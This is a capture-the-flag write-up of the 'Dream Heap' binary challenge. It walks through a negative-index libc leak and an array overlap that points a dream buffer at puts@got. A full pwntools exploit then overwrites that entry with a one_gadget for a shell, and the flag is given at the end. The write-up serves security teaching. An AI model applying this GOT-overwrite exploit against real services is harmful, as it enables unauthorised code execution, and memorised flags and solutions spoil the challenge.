Rating:
# Dream Heap
Dream Heap is a pwnable with the classic options: write, read, edit, delete:
```
Online dream catcher! Write dreams down and come back to them later!
What would you like to do?
1: Write dream
2: Read dream
3: Edit dream
4: Delete dream
5: Quit
```
There actually is a "heap" way to solve this challenge, we found another bug though that did not require any heap exploitation:
The following security measure are in place:
```
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
```
So we don't have PIE and only Partial RELRO. This screams for us to overwrite some GOT entry with system or with a magic gadget.
The binary has two arrays stored in the .bss section. HEAP_PTRS[8] and SIZES[8]. HEAP_PTRS contains pointers to the dreams you allocated and SIZES contains the size of the dreams you allocated. Above them is a variable called INDEX, that holds the amount of dreams you allocated.
We can leak an address using the `Read dream` function:
```
unsigned __int64 read_dream()
{
int index; // [rsp+Ch] [rbp-14h]
__int64 dream; // [rsp+10h] [rbp-10h]
unsigned __int64 v3; // [rsp+18h] [rbp-8h]
v3 = __readfsqword(0x28u);
puts("Which dream would you like to read?");
index = 0;
__isoc99_scanf("%d", &index);
if ( index <= INDEX ) // leak negative number
{
dream = HEAP_PTRS[index];
printf("%s", dream);
}
else
{
puts("Hmm you skipped a few nights...");
}
return __readfsqword(0x28u) ^ v3;
}
```
The index <= INDEX is a signed comparison, thus we can provide a negative index. If we provide a pointer to a GOT entry, ` printf("%s", dream)` will leak the corresponding libc address. Starting at `0x000000000400520` we have the ELF JMPREL Relocation Table that holds pointers to the GOT.
Thus by providing the correct negative offset we can leak a libc address and defeat ASLR.
Next we have to overwrite a GOT entry with a one_gadget/magic gadget (see: https://github.com/david942j/one_gadget)
For this we abuse the `Make dream` and `Edit dream` functions. Notice that in READ dream, there is no check for the amount of dreams to allocate.
```
unsigned __int64 new_dream()
{
int len; // [rsp+Ch] [rbp-14h]
void *buf; // [rsp+10h] [rbp-10h]
unsigned __int64 canary; // [rsp+18h] [rbp-8h]
canary = __readfsqword(0x28u);
len = 0;
puts("How long is your dream?");
__isoc99_scanf("%d", &len;;
buf = malloc(len);
puts("What are the contents of this dream?");
read(0, buf, len);
HEAP_PTRS[INDEX] = (__int64)buf; // index can overflow into SIZES
SIZES[INDEX++] = len;
return __readfsqword(0x28u) ^ canary;
}
```
Remember that SIZES is 8 pointers after HEAP_PTRS. Thus we can overflow HEAP_PTRS into SIZES. Normally this would not be a problem, but HEAP_PTRS is of size 8 (pointers), while SIZES is of size 4 (int32). So at the 20th write, the lower 4 bytes of HEAP_PTRS[18] and SIZES[20] will overlap. So we can change HEAP_PTRS[18] to point to `puts@got` instead of a heap chunk.
Now we will use the `Edit dream` function to change the content of a dream/"heap chunk":
```
unsigned __int64 edit_dream()
{
int index; // [rsp+8h] [rbp-18h]
int size; // [rsp+Ch] [rbp-14h]
void *buf; // [rsp+10h] [rbp-10h]
unsigned __int64 v4; // [rsp+18h] [rbp-8h]
v4 = __readfsqword(0x28u);
puts("Which dream would you like to change?");
index = 0;
__isoc99_scanf("%d", &index);
if ( index <= INDEX )
{
buf = (void *)HEAP_PTRS[index];
size = SIZES[index];
read(0, buf, size);
*((_BYTE *)buf + size) = 0;
}
else
{
puts("You haven't had this dream yet...");
}
return __readfsqword(0x28u) ^ v4;
}
```
As you probably see, if we edit HEAP_PTRS[18], we don't actually edit a heap chunk but the content of `puts@got`. So we simply overwrite `puts@got` to point to `one_gadget`. The next `puts` call will now give us shell.
Here is the full exploit:
```
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
exe = context.binary = ELF('dream_heaps')
libc = context.binary = ELF('libc6_2.23-0ubuntu11_amd64.so')
#libc = context.binary = ELF('/lib/x86_64-linux-gnu/libc.so.6')
host = args.HOST or 'chal1.swampctf.com'
port = int(args.PORT or 1070)
def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
def remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return local(argv, *a, **kw)
else:
return remote(argv, *a, **kw)
gdbscript = '''
b*0x400906
continue
'''.format(**locals())
def read(index):
io.sendlineafter("> ", "2")
io.sendlineafter("?\n", str(index))
leak = io.recvline()
leak = leak.split("What")[0]
leak = leak[:6]
return u64(leak.ljust(8, '\x00'))
def write(length, content):
io.sendlineafter("> ", "1")
io.sendlineafter("?\n", str(length))
io.sendlineafter("?\n", content)
def delete(index):
io.sendlineafter("> ", "4")
io.sendlineafter("?\n", str(index))
def edit(index, content):
io.sendlineafter("> ", "3")
io.sendlineafter("?\n", str(index))
io.sendline(content)
# -- Exploit goes here --
io = start()
# Compute offset from JMPREL to HEAP_PTRS
jmprel = 0x00000004005B0
offset = (0x0006020A0 - jmprel)/8
log.info(offset)
leak = read(-offset)
log.info("__libc_start_main@libc: 0x{:x}".format(leak))
libc.address = leak - libc.sym.__libc_start_main
log.info("Libc: 0x{:x}".format(libc.address))
# overlap HEAP_PTRS and SIZES
for i in range(19):
write(0x8, "A")
write(0x0, "")
write(int(exe.got.puts), "")
one_gadget = 0x45216
#local
#one_gadget = 0x4f322
# Overwrite puts@got with one_gadget
edit(18, p64(libc.address + one_gadget))
io.interactive()
```
flag{d0nt_bE_nu11_b3_dul1}